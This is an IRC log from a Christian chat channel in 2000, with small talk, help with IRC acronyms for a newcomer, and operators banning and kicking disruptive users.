[00:14] *** Topic is 'Encourage each other daily. (Hebrews 3:13)'
[00:14] *** Set by Beukeboom on Fri Sep 08 03:42:55
[00:14] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[00:14] <Vote4Bush> i will probably go to johnson bible college in knoxville TN
[00:14] <Colin^> wb Raid
[00:14] <Raid> sigh
[00:14] <Raid> Vote4Bush: It's an interesting place.
[00:14] <HotPink> don't go to milligan
[00:15] <gen|c0de> HotPink: youd be better off going to a regular college, most of the people ive encountered at those colleges are far from what youd call a christian
[00:15] *** Colin^ sets mode: -b *!Hell@*.sympatico.ca
[00:15] <Vote4Bush> lol im not going to milligan
[00:15] <gen|c0de> they get there all hot for jesus
[00:15] *** ironic^^ (666@203.170.14.152) Quit (Ping timeout for ironic^^[203.170.14.152])
[00:15] <HotPink> gen-well good for them
[00:15] <Vote4Bush> friend going there though
[00:15] <HotPink> they should get a cookie
[00:15] <HotPink> but i'm not them
[00:15] <Vote4Bush> raid you know johnson? or just knoxville?
[00:15] <gen|c0de> within a year they fall off the train per se
[00:15] <HotPink> milligan is so full of crap
[00:15] <Raid> Vote4Bush: both. hehe
[00:15] <HotPink> like half of the kids there smoke and drink
[00:15] <Raid> Vote4Bush: I went to johnson for a service contract; I'm one of the techs that fixes their stuff.
[00:15] <Colin^> HotPink watch the language please
[00:15] * HotPink watches
[00:15] <HotPink> yep
[00:16] <HotPink> there it is
[00:16] <gen|c0de> crap?
[00:16] <HotPink> heh
[00:16] <Vote4Bush> oh, alright. you probably met my uncle, he is dealing with most of that
[00:16] <gen|c0de> whats wrong with that?
[00:16] *** ironic^^ (666@203.170.14.152) has joined #Christian
[00:16] <HotPink> yeah
[00:16] *** satiaKat (cherish@ppp162.jn.centurytel.net) has joined #Christian
[00:16] <HotPink> i'm baffled too
[00:16] <HotPink> anyway
[00:16] <Vote4Bush> how is it full.... hotpink?
[00:16] <gen|c0de> how come you didnt say anything to me for using the lords name in vain??
[00:16] <HotPink> because they claim be strict
[00:16] <HotPink> and all for god and not allowing that stuff
[00:16] <HotPink> heh
[00:16] <gen|c0de> thats more of a 'crime' then saying crap
[00:17] <HotPink> and they just act like it doesn't happen
[00:17] *** Colin^ sets mode: +b *!*generic@*.quik.com
[00:17] *** gen|c0de was kicked by Colin^ (This random kick message was censored by popular request)
[00:17] <Vote4Bush> um
[00:17] <HotPink> you're such a hypocrite
[00:17] <Vote4Bush> did he just like... ask to be kicked?
[00:17] <HotPink> that was so stupid
[00:17] *** Kozubchik (orthodox@166.82.142.211) Quit (†[C-Script]† - www.C-Script.com and irc.C-Script.com)
[00:17] *** Colin^ sets mode: +b *!piglet@*.mvn.net
[00:17] *** HotPink was kicked by Colin^ (I'm only doing this because I care)
[00:17] <thumps> ;)
[00:17] *** laura7 (mortalem@12.128.176.175) Quit (Leaving)
[00:17] <Vote4Bush> arg
[00:17] *** satiaKat (cherish@ppp162.jn.centurytel.net) Quit (GOD IS AWSOME!!!..............ALL THE TIME!!!!)
[00:18] <Vote4Bush> whassup thumps
[00:18] <thumps> Vote4Bush: not much
[00:19] <YinsMom> see ya later thumps....bye room
[00:19] *** YinsMom (YinsMom@IP227210.DIALUP.WVNET.EDU) has left #Christian
[00:19] * PaganJoy hugs thumps till her has a Victorian cinched waistline
[00:19] <PaganJoy> her = he
[00:20] <thumps> hahah pags
[00:20] <Maverick> Scary.
[00:20] *** newzeal (kcf@210-55-144-52.dialup.xtra.co.nz) has left #Christian
[00:20] <Dovi-dude> night room, peace
[00:20] *** Dovi-dude (~Dovi-dude@a1p22-ct.megahits.net) has left #Christian
[00:21] * thumps hugs pags till she ............sez yes
[00:21] <PaganJoy> ooh la la
[00:21] <Lanfear`> to what?
[00:21] <thumps> ;)
[00:21] <Vote4Bush> heh
[00:22] *** Re[D]eemd (davo@cx328970-c.okcs1.ok.home.com) Quit (Mental floss with God's Word daily to prevent truth decay!)
[00:22] * Colin^ could do with a nice cup of tea
[00:23] <Raid> Hmmm
[00:23] <Raid> Thats actually a cute quit msg
[00:23] * Vote4Bush boils some water for tea
[00:24] <rts> except the idea of flossing one's brain doesn't sound so appealing
[00:24] <rts> you'd probably.. damage something, I'm sure
[00:24] <Vote4Bush> lol
[00:25] <rts> "Ow, my frontal lobe... *drool*"
[00:25] * Pipetobak reaches into the breast pocket of his flannel shirt and extracts a well worn, and well appreciated briar pipe. Meticulously he fills the pipe with delightful crumbles of leaf and gripping the stem of the pipe with his teeth, he strikes a match. The creamy, dense, vanilla tinted smoke is rich and delightful and he inhales it deeply with relish as he glances about looking for interesting conversation.
[00:26] <Raid> hmmm
[00:26] <Colin^> thumps can send you a home lobotomy kit to try rts
[00:26] <Raid> I have migraines a lot as it is, I think that would make it worse.
[00:26] <Maverick> Pipetobak: I'm sure those auto-scripts of yours get longer every time I see them.
[00:26] <Raid> shrug.
[00:27] * thumps reaches for his sharp fork
[00:27] <Raid> Maverick: He does it to annoy you. ;p Every time you complain, it grows by 2 lines. <G>
[00:27] <Maverick> LOL
[00:27] <Maverick> Really Raid?
[00:27] <Raid> no hehe
[00:27] <rts> Colin^: cool
[00:27] <Raid> but it sounded good didn't it? ;)
[00:27] *** fitzfield (~wella@202.78.95.104) has joined #Christian
[00:27] <rts> 'cause you know, I just have way too much brain
[00:27] <Colin^> Pipetobak changes them often
[00:28] *** ramdac (ramdac@1Cust138.tnt1.ruston.la.da.uu.net) has joined #Christian
[00:28] <Colin^> yesterday was a one liner and I almost fainted
[00:28] <Lanfear`> one liner?
[00:28] *** Adar_Caan (adarcaan@c184662-a.dals1.tx.home.com) Quit (NewYork-R.NY.US.Undernet.Org SantaClara.CA.US.Undernet.Org)
[00:28] *** Jubei (jirc@ascl-a2-9.usask.ca) Quit (NewYork-R.NY.US.Undernet.Org SantaClara.CA.US.Undernet.Org)
[00:29] <Lanfear`> oh..
[00:29] <Lanfear`> never mind
[00:29] * Vote4Bush blows everyone a kiss goodnight
[00:29] *** Vote4Bush (besordew@iq-ind-as005-92.iquest.net) Quit (Friends don't let friends vote democrat.)
[00:29] *** Adar_Caan (adarcaan@c184662-a.dals1.tx.home.com) has joined #Christian
[00:29] <Pipetobak> Yes I do, Colin. To keep it interesting for all.
[00:29] <Maverick> I can believe that.
[00:29] <Maverick> The day he floods the channel for it Colin^, you should kick him;-)
[00:29] *** Jubei (jirc@ascl-a2-9.usask.ca) has joined #Christian
[00:29] *** Jubei (jirc@ascl-a2-9.usask.ca) Quit (Leaving)
[00:30] *** Jubei1 (jirc@ascl-a2-9.usask.ca) has joined #Christian
[00:30] <thumps> and break the silence or idle chat?
[00:30] <rts> shh
[00:30] <Jubei1> I say we idle chat
[00:31] *** just_gal (~dacer@202.134.245.187) Quit (#kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #s)
[00:31] <Pipetobak> Why should I be kicked? I never flood the channel.
[00:32] <Pipetobak> I merely send an image of me so you may better visualize me as you speak to me.
[00:32] <Colin^> :o)
[00:33] * Maverick checks out more Matrix sites.
[00:33] *** Colin^ sets mode: -b *!*@supernal.godsey.net
[00:33] *** maiang (~cinde_cut@208.160.243.137) has joined #Christian
[00:33] *** fitzfield (~wella@202.78.95.104) Quit (Ping timeout for fitzfield[202.78.95.104])
[00:33] <Maverick> Boy.
[00:33] <Maverick> Its gone kinda quiet.
[00:33] <Maverick> Am I lagged?
[00:33] <Maverick> Or has everyone decided I am not worth listening to?
[00:33] * Maverick decides about this.
[00:33] *** LadyViv (Net1@async39-cab-isp-1.nas.one.net.au) has joined #Christian
[00:33] *** logos3 sets mode: +b *!*@*.one.net.au
[00:33] <Colin^> is chatting in message
[00:33] *** LadyViv was kicked by logos3 (banned: ISP banned: Continued illegal activity by one user)
[00:33] *** Colin^ sets mode: -o Colin^
[00:34] <Maverick> I canna find my glasses.
[00:35] <Colin^> Mine are on my nose
[00:35] *** ironic^^ (666@203.170.14.152) Quit (SoMEdAy, SomHoW, FaR bEyOuNd 2 DaY i WiLl FiNd ThE wAy 2 FiNd U bUt SoMeHoW tHrU tHe LoNlYnIghT i Will LiVe ThE In ThE dArK tHaT U r n2 My HeArt LoVe U .(.KATE))
[00:35] * rts is away: not here
[00:35] *** rts (~samm@cr1016134-a.crdva1.bc.wave.home.com) has left #Christian
[00:35] *** Pipetobak (Beard@as4-dial22.flnt.mi.voyager.net) Quit (Leaving)
[00:36] <Maverick> Oh my goodness I was lagged.
[00:36] *** Pipetobak (Beard@as4-dial22.flnt.mi.voyager.net) has joined #Christian
[00:36] <thumps> wb pipe :)
[00:37] <Maverick> Oh my goodness I was lagged.
[00:37] *** sansan` (ff@ip13.vancouver6.dialup.canada.psi.net) has joined #Christian
[00:37] <Maverick> Why didn't anyone tell me?
[00:37] <Maverick> huh?
[00:37] <Maverick> :P
[00:38] <Maverick> =)
[00:38] *** FuNNy (~aiue@202.77.100.241) has joined #Christian
[00:38] *** fitzfield (~wella@202.78.95.104) has joined #Christian
[00:39] *** eagles` (rashton@1Cust223.tnt4.adl1.da.uu.net) has joined #Christian
[00:39] <FuNNy> hi..
[00:39] <Colin^> hey eagles
[00:39] <eagles`> hey Colin^... just sent you an icq lol
[00:40] *** Dawn (prospect@bc-vic-a53-01-71.look.ca) has joined #Christian
[00:40] <FuNNy> colin??
[00:40] *** fitzfield (~wella@202.78.95.104) Quit (Broken pipe)
[00:40] <Dawn> hi, i'm new to this site
[00:41] <eagles`> hello Dawn... nice to meet you
[00:41] *** [Mo]- (DaBeans@btstts04c24.nbnet.nb.ca) has joined #Christian
[00:41] <Dawn> nice to meet you to eagles
[00:42] <FuNNy> hi dawn
[00:42] <Dawn> hi FuNNy
[00:42] <eagles`> you a Canadian, me an Ozzie Welsman, lol, who speaks a little French :)
[00:42] <FuNNy> hi
[00:42] <Dawn> I am actually new to the whole IRC experience
[00:43] <Raid> Dawn: Welcome.
[00:43] <FuNNy> how r u dawn?
[00:43] <eagles`> you are still welcome, happens to all of us at some stage :)
[00:43] <Lanfear`> well.. I have to get up REALLY early
[00:43] <Lanfear`> sigh sigh
[00:43] <[Mo]-> i speak french
[00:43] <Dawn> i am fine and how are you
[00:43] <Lanfear`> on a saturday no less.. chat ya'll later
[00:43] * Colin^ speaks french
[00:43] *** Lanfear` (trek@B104-13.BNSL.splitrock.net) Quit (Leaving)
[00:43] <Raid> sigh, bye lan.
[00:43] <eagles`> enchante, [Mo]-
[00:43] <[Mo]-> hehe
[00:43] <[Mo]-> who can really speak french here?
[00:44] <eagles`> un petit peu, mais ne pas dans ce channel
[00:44] <Dawn> I only understand French when I hearit
[00:44] *** thumps (awBabydawl@c949298-a.decatur1.il.home.com) has left #Christian
[00:44] <FuNNy> great
[00:44] <eagles`> on parles Anglais ici :)
[00:44] *** charisma (~Jazzman@dx-52.pempe.net) Quit (Why do people cry when they hear the word goodbye!!!!)
[00:44] <Maverick> hey eagles`
[00:44] <Colin^> Je parle francais mon ami
[00:44] <maiang> hi egales
[00:44] <maiang> hi eagles
[00:44] <Jubei1> I'm a redneck commie saskatchewan hick :)
[00:44] <eagles`> yo Maverick :)
[00:44] <Jubei1> I don't speak french... but I can say "I loose" in ancient Greek :)
[00:44] <eagles`> kewl <g>
[00:44] <Jubei1> I just started learning the language last week :)
[00:44] <eagles`> hehe
[00:45] <[Mo]-> a oui, hé bien c'est vraiment amusant a savoir Colin^
[00:45] <eagles`> this is why I come on to IRC, to chat and have a fun time
[00:45] <Jubei1> Colin, I understood. Mo, you lost me :)
[00:45] *** `Ash` (joyfull@zoom12-031.telepath.com) has joined #Christian
[00:45] <Colin^> brb
[00:45] <[Mo]-> :P
[00:45] *** Colin^ (hello@p99-tnt1.ham.ihug.co.nz) has left #Christian
[00:45] <Raid> Dawn: Just so you know, IRC is very addicting. :)
[00:45] *** Colin^ (hello@p99-tnt1.ham.ihug.co.nz) has joined #Christian
[00:45] <maiang> bye
[00:45] * eagles` remembers starting to learn german in school and the first words were vulgar when said in English
[00:45] <Dawn> that i have heard and i can see why
[00:45] <eagles`> I eat.... and father
[00:46] *** X sets mode: +o Colin^
[00:46] <eagles`> oh dear dont kick me!!!!!!!!!!!
[00:46] *** Colin^ sets mode: -b *!*gggr@202.77.100.*
[00:46] *** Colin^ sets mode: +b *!*@202.77.100.*
[00:46] *** FuNNy was kicked by Colin^ (P.S. This doesn't mean we can't be friends)
[00:46] <Dawn> can someone tell me what brb and :p means
[00:46] <`Ash`> be right back
[00:46] <Colin^> be right back
[00:46] <Dawn> i know what lol means
[00:46] <[Mo]-> k
[00:46] <Colin^> :p is someone poking their tounge out
[00:47] *** maiang (~cinde_cut@208.160.243.137) Quit (Yesterday is History...Tomorrow is Mystery..Today is a Gift..thats why its called " present "...Live it !!!)
[00:47] <eagles`> brb is an acronym... be right back
[00:47] <Dawn> thank you
[00:47] <eagles`> asl often asked by filipinos, is age sex location
[00:47] <eagles`> ctc is care to chat
[00:47] <Dawn> oh lovely
[00:47] <Jubei1> :) is something that is overused
[00:47] <eagles`> rofl is rolling on the floor laughing
[00:48] <eagles`> quite something to do in real life :))
[00:48] <eagles`> oh and rl is real life
[00:48] <[Mo]-> lol
[00:48] <Colin^> :oÞ
[00:49] <eagles`> Dawn you are using mIRC like I am... they have a very good series of helps on their website and in their help files
[00:49] <[Mo]-> and std is something to do
[00:49] <eagles`> heh didnt know that!
[00:49] <[Mo]-> lol
[00:49] <Dawn> i should check out the help files, and i thank you for all your help
[00:50] <eagles`> meant to add that much of the acronyms are in those help files
[00:50] *** Colin^ sets mode: -bbb *!piglet@*.mvn.net *!*generic@*.quik.com *!*DIE@*.rcn.com
[00:50] *** Colin^ sets mode: -o Colin^
[00:50] <Dawn> great to know
[00:50] <Raid> Dawn: and you can learn just by being in chat... it's fun.
[00:50] *** `Ash` (joyfull@zoom12-031.telepath.com) has left #Christian
[00:50] <eagles`> sure is
[00:51] <Dawn> i watched a bit here and there to get the jist of it.
[00:51] *** Icon (Icon@idxwc07-08.idx.com.au) has joined #Christian
[00:51] <eagles`> sometimes its boring, sometimes infuriating, but mostly it's great... and as Raid said, can become addictive very easily
[00:51] <Maverick> Oh no.
[00:51] *** gen|c0de (~genera@ipa023.boston.quik.com) has joined #Christian
[00:52] <Colin^> wb gen|c0de
[00:52] <gen|c0de> crap.
[00:52] <Dawn> i know i need to be careful, often i am not doing to much so this could become a habit that may not be to good
[00:52] <gen|c0de> i was sitting there playing with identd
[00:52] <gen|c0de> and i went hrm
[00:52] <gen|c0de> dude its only a nick ban
[00:52] <gen|c0de> regardless
[00:52] *** Icon (Icon@idxwc07-08.idx.com.au) has left #Christian
[00:52] <Colin^> gen|c0de I removed the ban
[00:52] <eagles`> Dawn you need to be careful to whom you give personal details because cyber stalking is a very realproblem
[00:53] <gen|c0de> no you didnt
[00:53] <Colin^> Yes I did kid
[00:53] <gen|c0de> unless you di it just like 5 seconds ago
[00:53] <gen|c0de> hi raid
[00:53] <Colin^> I did
[00:53] <gen|c0de> :)
[00:53] *** Icon (~cookie@idxwc07-08.idx.com.au) has joined #Christian
[00:53] <Raid> gen|c0de: heh, hello ;p
[00:53] <Dawn> i understand that, I knew someone who got into trouble
[00:53] *** generic (~generic@ipa023.boston.quik.com) has joined #Christian
[00:53] <Colin^> ** Colin^ sets mode: -bbb *!piglet@*.mvn.net *!*generic@*.quik.com *!*DIE@*.rcn.com
[00:53] <Colin^> (eagles`): meant to add that much of the acronyms are in those help files
[00:53] *** Icon (~cookie@idxwc07-08.idx.com.au) Quit (Read error to Icon[idxwc07-08.idx.com.au]: EOF from client)
[00:53] <eagles`> gen|c0de I wonder why you are arguing?you are in here... therefore no ban... as I see it
[00:53] <Colin^> gen|c0de see it?
[00:53] <gen|c0de> ah well you just did it a few minutes ago
[00:54] <generic> this is me too
[00:54] <eagles`> so what buddy? grrrrrrrr
[00:54] <Colin^> Make one of them go generic
[00:54] <Dawn> how does one get banned?
[00:54] <gen|c0de> regardless, learn how to do bans correctly
[00:54] <gen|c0de> better yet
[00:54] <eagles`> very easily lol
[00:54] *** X sets mode: +o Colin^
[00:54] <eagles`> here it comes
[00:54] *** gen|c0de (~genera@ipa023.boston.quik.com) has left #Christian
[00:54] <eagles`> lol
[00:54] <Dawn> lol
[00:54] <Colin^> Thanks
[00:54] *** generic (~generic@ipa023.boston.quik.com) has left #Christian
[00:55] *** generic (~generic@ipa023.boston.quik.com) has joined #Christian
[00:55] <eagles`> hmmm my script didnt pick up the clone
[00:55] *** FlyGuy_38 (NorthGuy51@ptcm02m03-196.bctel.ca) has joined #Christian
[00:55] *** BassPlaye (~dontyouda@cras58p137.navix.net) has joined #Christian
[00:55] <Colin^> Hey BassPlaye
[00:55] <generic> hey i just realized my part message didnt come through
[00:55] <BassPlaye> hi
[00:55] <eagles`> hey the canuks are coming in fast
[00:55] <Colin^> Hello FlyGuy_38
[00:55] <eagles`> hi BassPlaye
[00:55] <generic> you can go fuck yourtself cause i didnt want to be here anyways
[00:55] *** generic (~generic@ipa023.boston.quik.com) has left #Christian
[00:55] <FlyGuy_38> hi
[00:56] *** X sets mode: +o eagles`
[00:56] <eagles`> i have word kick enabled
[00:56] <Dawn> now now watch your language:)
[00:56] *** rts (~samm@cr1016134-a.crdva1.bc.wave.home.com) has joined #Christian
[00:56] <Colin^> Hi rts
[00:56] <rts> yo
[00:56] <eagles`> hey rts
[00:56] *** Colin^ sets mode: -o Colin^
[00:57] <rts> greetings
[00:57] <eagles`> duh didnt mean to push you off the pole Colin^
[00:57] <Colin^> eagles` tis ok, I wanted to read a newsgroup
[00:57] *** weird (mirr@edtntnt3-port-57.dial.telus.net) has joined #Christian
[00:58] <weird> oh oh i am there
[00:58] *** JAA98 (~ielli@208.160.238.17) has joined #Christian
[00:58] <eagles`> Dawn you were asking about banning... we are pretty tolerant here excepyt with those who come in deliberately to make trouble
[00:58] <weird> apologies peoples
[00:59] <Dawn> i see, this is good:)
[00:59] <PaganJoy> hi Dawn
[00:59] <Dawn> Hi
[01:00] <weird> i am not weird
[01:00] <Dawn> i'm sure you're not
[01:00] <Jubei1> Your name is misleading then :)
[01:00] <Raid> Dawn: Just play it cool and bans aren't something you'll have to worry about.
[01:00] <Jubei1> Myself, I'm completely mad
[01:00] <weird> its a mistaken story too long to tell
[01:00] <eagles`> we have a three-strikes-and-you-are-out policy generally speaking, a "kick" to remove ppl, and finally on the third offence a ban which runs for 24 hours typically
[01:01] *** Philip15 (CrAzzy@202.151.212.31) has joined #Christian
[01:01] <Jubei1> I play in large vats of jelly
[01:01] <Jubei1> I scream at the top of my lungs
[01:01] <weird> how do you mark?
[01:01] <Jubei1> I live to laugh and be jolly
[01:01] *** Philip15 (CrAzzy@202.151.212.31) Quit (don't love me from what u intend or hope that I would be, and if ur only using me to feed ur fantasy, you're not really in love, so let me go, I must be free!!!)
[01:01] <eagles`> Jubei1 sounds a sticky sort of situation to me :)
[01:01] <Jubei1> and I stuff my face with fresh baked buns
[01:01] <Jubei1> (I mean that in a totally non-sexual way)
[01:02] *** Disconnected
[01:02] * Raid is away since 01:02:26 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.
[01:02] *** Attempting to rejoin...
#CHristian Cannot send to channel
[01:02] * Raid has returned ( Auto-Away: Not here ) - on 01:02:29 @ 09/09/2000 - Away 0 minutes.
[01:02] *** Rejoined channel #christian
[01:02] *** Topic is 'Encourage each other daily. (Hebrews 3:13)'
[01:02] *** Set by Beukeboom on Fri Sep 08 03:42:57
[01:02] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[01:02] <Jubei1> Once I was a philosophy major :)
[01:02] <PaganJoy> wb Raid!
[01:02] <Raid> My isp has got to get that fixed.
[01:02] <Jubei1> Once when my sanity was still intact
[01:02] <weird> well no i don't know....
[01:03] <Jubei1> But then... oh poor fortune that is me... it cracked... it cracked...
[01:03] <eagles`> hey the pagster didnt see you !!!!!!!!!!!!!!!!!!!!!!!!!!
[01:03] * Jubei1 brays laughing uncontrollably
[01:03] <PaganJoy> eagles!! hiya!!!!!!!! :)
[01:03] <eagles`> like a cuppa tea?
[01:03] <PaganJoy> Jubei-- go "The Nanny"'s laugh down pat? ;)
[01:03] <weird> yeah i would ta:)
[01:03] <PaganJoy> mmm tea!!
[01:04] <eagles`> Dawn there's also sounds linked to irc... does your computer have a sound card?
[01:04] <Jubei1> Pagan> If it was... then I would be deranged, not merely mad
[01:04] <weird> green preferable
[01:04] *** sWeAtPeA (Havoc36@ACA0D0DB.ipt.aol.com) has joined #CHristian
[01:04] <Jubei1> But I am mad you see, and I'm also nutty
[01:04] <eagles`> if someone plays a sound your mirc can find, yours then plays the same one
[01:04] * PaganJoy nods solemnly
[01:04] <Jubei1> Which explains why women seem to like me with ice cream and other sweet things
[01:04] * eagles` likes nutty.old navy expression for chocolate
[01:04] <weird> yeah yeah i dont do wavs:)
[01:04] <Dawn> i do not believe so. I am also new to the full extent of the computer world
[01:05] <eagles`> thats fine:)
[01:05] <eagles`> you know the diff between :) and :( ??
[01:05] <Jubei1> Whenever they see me they start shaking the cans, or scooping the tubs
[01:05] <Dawn> yes
[01:05] <Jubei1> They cover me, and then eat me all up
[01:05] <Jubei1> Cause I'm nutty
[01:05] * Jubei1 strolls around with a monacle and tophat
[01:06] <Jubei1> See... completely nutty... *twirls his cane*
[01:06] *** ^jer-bear (me@madras16-53.bendnet.com) has joined #CHristian
[01:06] <Dawn> i don't like being :( only :)
[01:06] <weird> who are you asking this eagle?:):(
[01:06] <eagles`> talking to Dawn who is new to IRC
[01:06] <weird> oh
[01:06] <weird> ok
[01:07] <Jubei1> But I think I'm going to retire from being insane
[01:07] <Jubei1> It is too much effort, too little pay
[01:07] <eagles`> also Dawn in mirc you can use the TAB key to save typing a person's nickname... time saver... did you know that? It's called"nick complete"
[01:07] <Jubei1> I'll miss those pretty blue things they give you to swallow at that nice place with men in white suits
[01:07] <Jubei1> But I think I am ready to move on
[01:07] <weird> huh
[01:07] * eagles` holds the door open
[01:08] <Jubei1> (Valium pills at the nuthouse) ;)
[01:08] <weird> nice
[01:08] *** CodePoet (kenneth@yak-p2-14.wolfenet.com) has joined #CHristian
[01:08] <weird> like nice
[01:08] *** Ixithmm (~hello@HSE-Montreal-ppp103152.sympatico.ca) Quit (Leaving)
[01:08] <Jubei1> I wish I had MIRC, but instead I have a java applet
[01:08] <Jubei1> Oops, accidently hit bold
[01:08] <Dawn> I have heard of that, I'm just winging this ya know:)
[01:08] <CodePoet> mIRC sucks
[01:08] <CodePoet> :P
[01:08] <weird> not a lot:)
[01:09] <Jubei1> Well, to bed with I
[01:09] <Jubei1> Goodnight all
[01:09] *** Jubei1 (jirc@ascl-a2-9.usask.ca) Quit (Leaving)
[01:09] <eagles`> bye Jubeil
[01:09] *** TacoMan (taco_man17@pm3a-176.dillon.mcn.net) has joined #CHristian
[01:10] <Maverick> Oh dear.
[01:10] <eagles`> oh?
[01:10] * eagles` wonders why isnt in her channel 2
[01:10] <weird> now you guys i have a question?
[01:10] * eagles` changes nick to dumbo - all ears
[01:11] <weird> IF
[01:11] <weird> if i want to join philosophy
[01:11] *** FlyGuy_38 (NorthGuy51@ptcm02m03-196.bctel.ca) has left #CHristian
[01:11] <weird> and IF
[01:12] <weird> if they think i am weird
[01:12] *** Pipetobak (Beard@as4-dial22.flnt.mi.voyager.net) Quit (Ping timeout for Pipetobak[as4-dial22.flnt.mi.voyager.net])
[01:13] <weird> how come its ok for me to be in christian?
[01:13] <Colin^> weird yes
[01:13] <eagles`> missed the drift of the question, sorry
[01:13] *** charisma (~Jazzman@dx-52.pempe.net) has joined #CHristian
[01:13] <weird> the drift was obscure... true
[01:13] *** Kenshin^^ (Kenshin@202.57.102.154) has joined #CHristian
[01:13] <Colin^> weird no one can se you in #christian from another channel anyway, its set on secret
[01:14] <eagles`> see up the top it says channel modes are +stn
[01:14] <weird> not the point Colin^
[01:14] *** ^_John_^ (dirc@ppp162.jn.centurytel.net) has joined #CHristian
[01:14] <eagles`> secret, topics set by ops, no notices in
[01:14] *** cierra (Beloved@ppp-3-46.compuwise.net) has joined #CHristian
[01:14] <weird> oh ok what does that that mean?
[01:14] *** charisma (~Jazzman@dx-52.pempe.net) has left #CHristian
[01:14] <eagles`> secret means you dont show up on someone's /whois or on /names
[01:15] <weird> oh
[01:15] <Dawn> now i don't understand this secret stuff
[01:15] *** [Mo]- (DaBeans@btstts04c24.nbnet.nb.ca) has left #CHristian (CaLiNe DE BoNnEs BiNnEs)
[01:15] <eagles`> unless they are in the same secret channel
[01:15] <cierra> hi pags
[01:15] <Colin^> weird so is the point " we think you are weird to be here ??
[01:15] <cierra> :)
[01:15] <eagles`> it is a protection, Dawn
[01:15] *** ^_John_^ is now known as ^John^
[01:15] <PaganJoy> hi cierra :)
[01:15] <cierra> :)
[01:15] <Colin^> HI ^John^
[01:15] <Colin^> hello cierra
[01:15] <cierra> hi colin
[01:15] <weird> well i am but do you think so
[01:15] <^John^> Hi ppl
[01:15] <eagles`> yes, weird
[01:15] <logos3> yes, wierd
[01:15] <weird> oh oh i am assuming my nick
[01:16] <Colin^> weird yes
[01:16] <eagles`> snap
[01:16] <weird> good one....
[01:16] *** ^jer-bear (me@madras16-53.bendnet.com) Quit (Leaving)
[01:16] <weird> i luv it!
[01:16] *** jamie^16 (~Jazzman@dx-52.pempe.net) has joined #CHristian
[01:16] <eagles`> brb, afk a moment ( Dawn that means away from keyboard)
[01:16] *** Kenshin^^ (Kenshin@202.57.102.154) Quit ((VirusScript 2øøø) GeT iT aT http://www.v2000.cjb.net/ and http://www.yasarozg.net/)
[01:18] <weird> Scotish water is soft
[01:18] <weird> t
[01:18] <Colin^> weird its the Peat
[01:18] <weird> aaaah
[01:18] <weird> like carbonated?
[01:19] <Colin^> THats why they make such good Scotch
[01:19] <weird> the glens
[01:19] <Colin^> The water is filtered by the Peat
[01:19] <weird> aaaaah
[01:19] <weird> well it is true
[01:19] <weird> hair needs no conditioning
[01:20] <PaganJoy> niters all
[01:20] * PaganJoy waves :)
[01:20] *** PaganJoy (frostfire@user-38ld3dm.dialup.mindspring.com) Quit (Umm.. where am I going, and what's with this handbasket??)
[01:21] *** BassPlaye (~dontyouda@cras58p137.navix.net) Quit (Ping timeout for BassPlaye[cras58p137.navix.net])
[01:22] *** twile (freezer@207.0.112.77) has joined #CHristian
[01:22] <weird> so subteranean water is not a secret
[01:22] <weird> i just went there for the first time last month
[01:22] *** bu2zard (~wanabe@203.106.34.67) has joined #CHristian
[01:22] <Colin^> weird to the Highlands?
[01:22] <eagles`> Dawn there's another one, bbiab be back in a bit
[01:22] <weird> yes
[01:22] *** Maverick (teri@203-79-93-232.tnt11.paradise.net.nz) Quit (Ping timeout for Maverick[203-79-93-232.tnt11.paradise.net.nz])
[01:23] <Dawn> thanks
[01:23] <weird> tho they liked me:)
[01:23] *** bu2zard (~wanabe@203.106.34.67) Quit (Leaving)
[01:23] *** sWeAtPeA (Havoc36@ACA0D0DB.ipt.aol.com) has left #CHristian (havoc.(r)oots.(r)adical)
[01:23] <weird> thing i liked also was highland bands.....
[01:24] <weird> like there was this dutch highland band
[01:24] <weird> in kilts
[01:24] *** danimal (anon@sdn-ar-010txhousP121.dialsprint.net) has joined #CHristian
[01:25] <weird> nice tooo
[01:25] <weird> i like a look of the kilt
[01:25] <weird> but
[01:25] * rts is away: not here
[01:25] <weird> dutch?
[01:25] *** rts (~samm@cr1016134-a.crdva1.bc.wave.home.com) has left #CHristian
[01:25] <Dawn> eagles` thanx for all the info and your time out to let me know what things mean
[01:25] <eagles`> we have highland bands here in Austrlai too - on the plains, lol
[01:26] <eagles`> thats fine, look forward to seeing you again :)
[01:26] <eagles`> take care, God bless you
[01:26] <Colin^> Irish play the bagpipes as well
[01:26] <weird> and pipes
[01:26] <Dawn> Thanx and God Bless:)
[01:26] <weird> and harps
[01:26] <eagles`> yeah, they gave the Scots them as a present, and the Sciots havent seen the joke yet,lol
[01:27] *** Dawn (prospect@bc-vic-a53-01-71.look.ca) has left #CHristian
[01:27] <weird> eagles that wasnt funny:(
[01:27] <eagles`> lol
[01:27] * eagles` actually loves pipe bands
[01:27] <weird> so oh ok goodie:)
[01:27] <eagles`> <g>
[01:28] <Colin^> I like Pipebands as well, I can still sing Scotland the brave
[01:28] <eagles`> the first time I ever heard Amazing Grace it was played by a pipe band
[01:28] * weird just sings psalms
[01:28] <weird> well psalters
[01:28] <Colin^> eagles` Paul mccartney did a bagpipe version, remember that?
[01:28] <eagles`> that would be about 1968
[01:28] <weird> but is not weird
[01:29] *** Bond-007 (PBrosnan@17-133.nctimes.net) has joined #CHristian
[01:29] <eagles`> no, I don't. I remember a single released while I was working at the TV station at Bunbury
[01:29] <Colin^> Hi Bond-007
[01:29] <weird> mull of kintire
[01:29] <Bond-007> Wooo!! GO GOLDEN BEARS!
[01:29] <Colin^> weird yep
[01:29] <eagles`> thats beautiful too
[01:29] <weird> yeah.....soooo gooood
[01:29] <Colin^> Bond-007 Gummy bears?
[01:29] <Bond-007> Just went to my high school's football game. We kicked the crud out of the other team :)
[01:29] <Bond-007> No! Golden Bears!! :)
[01:29] <cierra> woo hoo
[01:29] <cierra> bond
[01:30] *** tree` (.@cr432677-a.ym1.on.wave.home.com) has joined #CHristian
[01:30] <weird> i play mull of kintire on the pianee
[01:30] <weird> ten fingers
[01:30] * Colin^ prefers Gummy Bears
[01:30] * Bond-007 plays Nirvana in honor of the TVHS Bears
[01:30] <Bond-007> hehe Colin
[01:31] <weird> mix and match
[01:31] * eagles` forgets what he came on line to do
[01:31] <eagles`> grrrrrr
[01:31] <weird> so (bite me)
[01:32] * weird asks what Christian means?
[01:32] <Bond-007> It feels so nice to sit in this chair compared to the metal benches
